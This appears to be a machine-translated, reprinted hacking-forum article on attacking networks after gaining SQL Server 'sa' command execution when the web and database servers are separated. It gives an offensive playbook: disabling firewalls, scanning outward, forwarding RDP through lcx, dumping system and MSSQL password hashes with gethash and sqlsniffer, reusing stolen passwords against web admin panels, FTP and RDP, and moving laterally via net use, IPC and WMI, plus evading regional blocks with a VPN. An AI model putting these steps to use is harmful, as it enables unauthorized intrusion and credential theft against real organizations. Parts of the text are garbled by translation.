When you encounter SA injection points, you can execute commands, but the web and database are separated, what do you do? When the database is not connected to the Internet by the server, I just want to do it from the web. This article is reprinted from t00ls. I hope to provide some penetration ideas for database web separation by injecting sa permissions to everyone.
SA point, system permission, executable command, web and db separation. DB machines do not access the Internet (generally, it means that the middleware cannot go online and the lcx cannot rebound)
1. The database has a public IP address.
1: run the command to stop the system firewall and ip policy. netstat-an finds port 3389 and tries to connect.
2: scanning from the inside out. convert the s scanner under the command line to vbs and upload it to the DB machine to generate an exe to scan the Internet. this Internet machine opens all ports. (You can find such a machine on the Internet .) if the scan result has an open port, it indicates that 3389 can be transferred to an external machine on this DB machine. for example, if the ip address is 80, then lcx-slave ip 80 127.0.0.1 3389.
3: Use as many passwords as possible. use the vbs method to upload the gethash and sqlsniffer tools. obtain the password of the system and mssql, the background administrator password of the database table, and the first several user passwords of the member table. these passwords can be used to test the web Background and web 3389 ftp. of course, you must scan the web machine in advance. www.2cto.com
4. nmap scan. use nmap to scan the 1-65535 ports of web and db machines. if the database machine is found to have a closed port. congratulations! You can use lcx-tran to forward 3389 to this port and log on directly. firewalk has similar functions. but it is useless to the proxy firewall.
2. DB machines only have Intranet IP addresses
1: Try to use as many passwords as possible to net use the web machine. This process requires a lot of patience :). use the password to try to log on to the web background.
2: Stop the firewall and IP policy and then scan from the inside out.
3: If ipconfig/dispalydns finds a domain name with a public network, it is very likely that the route has been done. There are still opportunities.
4: It is often surprising to learn the regular analysis of passwords.
5. execute commands in the sa point to penetrate the Intranet and find the machine that can access the Internet, such as. isql, ipc sharing, and wmi.
Some regions or countries prohibit other countries from connecting to some ports, so it is important to have a proxy or VPN in the target country.